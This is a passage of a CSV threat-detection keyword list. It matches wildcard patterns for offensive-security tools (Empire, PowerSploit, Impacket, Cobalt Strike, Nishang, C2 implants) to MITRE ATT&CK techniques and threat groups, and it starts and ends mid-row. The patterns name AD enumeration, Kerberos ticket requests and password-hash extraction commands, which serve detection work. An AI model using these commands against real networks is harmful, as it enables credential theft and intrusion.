by attackers to identify potential targets for privilege escalation or lateral movement within the network.","T1069.001","TA0007","N/A","N/A","Reconnaissance","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*Get-NetLocalGroup*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-NetLoggedon -*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-NetLoggedon*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-NetRDPSession -*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-NetRDPSession*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-NetSession*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-NetShare*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-NetSubnet*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-NetUser -SPN*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-NetUser -SPN*","greyware_tool_keyword","powershell","PowerView Find users with SPN","T1069.002 - T1087.002 - T1018","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*Get-NetUser -UACFilter NOT_ACCOUNTDISABLE*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*getNimplantByGuid*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*GetNPUsers.py -request*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*GetNPUsers.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*getnthash.py -key *","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z" +"*getnthash.py -key '8eb7a6388780dd52eb358769dc53ff685fd135f89c4ef55abb277d7d98995f72'*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*getnthash.py*","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","5","493","68","2023-04-28T00:28:37Z","2021-07-27T19:06:09Z" +"*Get-NTLM.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*GetNTLMChallengeBase64*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"*getPac.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*Get-PacketNetBIOSSessionService*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-PacketNTLMSSPAuth*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-PacketNTLMSSPNegotiate*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-PacketRPCBind*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-PacketRPCRequest*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-PacketSMB*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-PassHashes*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Get-PassHints*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*get-passnotexp*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*get-password-policy.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*Get-PEBasicInfo*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1104","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-PEHeader.ps1*","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","863","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" +"*getPositionImplant*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*getprivs.bin*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - 